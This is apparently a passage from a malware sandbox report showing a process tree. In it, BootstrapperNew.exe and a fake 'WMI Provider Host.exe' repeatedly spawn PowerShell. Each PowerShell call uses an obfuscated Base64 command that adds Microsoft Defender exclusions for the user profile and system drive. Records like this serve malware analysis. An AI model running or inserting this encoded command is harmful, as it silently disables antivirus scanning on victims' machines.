        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        37⤵
        
        PID:7688
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        37⤵
        
        PID:7720
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        37⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        38⤵
        
        PID:7932
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        38⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        38⤵
        
        PID:7972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        39⤵
        
        PID:8188
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        39⤵
        
        PID:6248
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        39⤵
        
        PID:6352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        40⤵
        
        PID:7324
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        40⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        40⤵
        
        PID:6736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        41⤵
        
        PID:4952
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        41⤵
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        41⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        42⤵
        
        PID:7180
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        42⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        42⤵
        
        PID:3304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        43⤵
        
        PID:4208
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        43⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        43⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        44⤵
        
        PID:6692
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        44⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        44⤵
        
        PID:3696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        45⤵
        
        PID:4940
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        45⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        45⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        46⤵
        
        PID:7756
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        46⤵
        
        PID:7512
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        46⤵
        
        PID:7620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        47⤵
        
        PID:2904
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        47⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        47⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        48⤵
        
        PID:1572
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        48⤵
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        48⤵
        
        PID:1832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        49⤵
        
        PID:768
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        49⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        49⤵
        
        PID:7876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        50⤵
        
        PID:2128
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        50⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        50⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        51⤵
        
        PID:2164
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        51⤵
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        51⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        52⤵
        
        PID:3948
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        52⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        52⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        53⤵
        
        PID:6036
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        53⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        53⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        54⤵
        
        PID:5276
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        54⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        54⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        55⤵
        
        PID:7876
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        55⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        55⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        56⤵
        
        PID:4064
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        56⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        56⤵
        
        PID:6324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        57⤵
        
        PID:6192
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        57⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        57⤵
        
        PID:5936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        58⤵
        
        PID:5236
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        58⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        58⤵
        
        PID:6752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        59⤵
        
        PID:6256
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        59⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        59⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        60⤵
        
        PID:3740
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        60⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        60⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        61⤵
        
        PID:5768
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        61⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        61⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        62⤵
        
        PID:4372
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        62⤵
        
        PID:5404
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        62⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        63⤵
        
        PID:6032
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        63⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        63⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        64⤵
        
        PID:880
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        64⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        64⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        65⤵
        
        PID:1312
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        65⤵
        
        PID:5936
        
